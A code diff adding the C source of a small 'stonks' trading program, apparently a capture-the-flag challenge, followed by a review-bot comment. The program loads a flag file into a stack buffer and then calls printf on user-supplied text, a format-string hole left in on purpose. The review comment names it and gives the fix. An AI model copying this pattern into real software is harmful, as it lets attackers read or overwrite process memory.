+#define FLAG_BUFFER 128
+#define MAX_SYM_LEN 4
+
+typedef struct Stonks {
+ int shares;
+ char symbol[MAX_SYM_LEN + 1];
+ struct Stonks *next;
+} Stonk;
+
+typedef struct Portfolios {
+ int money;
+ Stonk *head;
+} Portfolio;
+
+int view_portfolio(Portfolio *p) {
+ if (!p) {
+ return 1;
+ }
+ printf("\nPortfolio as of ");
+ fflush(stdout);
+ system("date"); // TODO: implement this in C
+ fflush(stdout);
+
+ printf("\n\n");
+ Stonk *head = p->head;
+ if (!head) {
+ printf("You don't own any stonks!\n");
+ }
+ while (head) {
+ printf("%d shares of %s\n", head->shares, head->symbol);
+ head = head->next;
+ }
+ return 0;
+}
+
+Stonk *pick_symbol_with_AI(int shares) {
+ if (shares < 1) {
+ return NULL;
+ }
+ Stonk *stonk = malloc(sizeof(Stonk));
+ stonk->shares = shares;
+
+ int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1;
+ for (int i = 0; i <= MAX_SYM_LEN; i++) {
+ if (i < AI_symbol_len) {
+ stonk->symbol[i] = 'A' + (rand() % 26);
+ } else {
+ stonk->symbol[i] = '\0';
+ }
+ }
+
+ stonk->next = NULL;
+
+ return stonk;
+}
+
+int buy_stonks(Portfolio *p) {
+ if (!p) {
+ return 1;
+ }
+ char api_buf[FLAG_BUFFER];
+ FILE *f = fopen("api","r");
+ if (!f) {
+ printf("Flag file not found. 
Contact an admin.\n");
+ exit(1);
+ }
+ fgets(api_buf, FLAG_BUFFER, f);
+
+ int money = p->money;
+ int shares = 0;
+ Stonk *temp = NULL;
+ printf("Using patented AI algorithms to buy stonks\n");
+ while (money > 0) {
+ shares = (rand() % money) + 1;
+ temp = pick_symbol_with_AI(shares);
+ temp->next = p->head;
+ p->head = temp;
+ money -= shares;
+ }
+ printf("Stonks chosen\n");
+
+ // TODO: Figure out how to read token from file, for now just ask
+
+ char *user_buf = malloc(300 + 1);
+ printf("What is your API token?\n");
+ scanf("%300s", user_buf);
+ printf("Buying stonks with token:\n");
+ printf(user_buf);
+
+ // TODO: Actually use key to interact with API
+
+ view_portfolio(p);
+
+ return 0;
+}
+
+Portfolio *initialize_portfolio() {
+ Portfolio *p = malloc(sizeof(Portfolio));
+ p->money = (rand() % 2018) + 1;
+ p->head = NULL;
+ return p;
+}
+
+void free_portfolio(Portfolio *p) {
+ Stonk *current = p->head;
+ Stonk *next = NULL;
+ while (current) {
+ next = current->next;
+ free(current);
+ current = next;
+ }
+ free(p);
+}
+
+int main(int argc, char *argv[])
+{
+ setbuf(stdout, NULL);
+ srand(time(NULL));
+ Portfolio *p = initialize_portfolio();
+ if (!p) {
+ printf("Memory failure\n");
+ exit(1);
+ }
+
+ int resp = 0;
+
+ printf("Welcome back to the trading app!\n\n");
+ printf("What would you like to do?\n");
+ printf("1) Buy some stonks!\n");
+ printf("2) View my portfolio\n");
+ scanf("%d", &resp);
+
+ if (resp == 1) {
+ buy_stonks(p);
+ } else if (resp == 2) {
+ view_portfolio(p);
+ }
+
+ free_portfolio(p);
+ printf("Goodbye!\n");
+
+ exit(0);
+}
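Review bot: `printf(user_buf)` in `buy_stonks` hands user-controlled text to `printf` as the format string; the fix is `printf("%s\n", user_buf);` (or `fputs`). The same function leaves `f` open after `fgets(api_buf, FLAG_BUFFER, f)`, never checks that `fgets` or `malloc(300 + 1)` succeeded, and `scanf("%300s", user_buf)` then writes through a possibly-NULL pointer; an `fclose(f)` after the read and a NULL check on `user_buf` close both gaps. `pick_symbol_with_AI` and `initialize_portfolio` dereference their `malloc` results without checking them, so the `if (!p)` guard in `main` can never fire on allocation failure. `view_portfolio` spawns a shell via `system("date")` for a timestamp that `time()`/`strftime` can produce in-process, as the TODO beside it already notes.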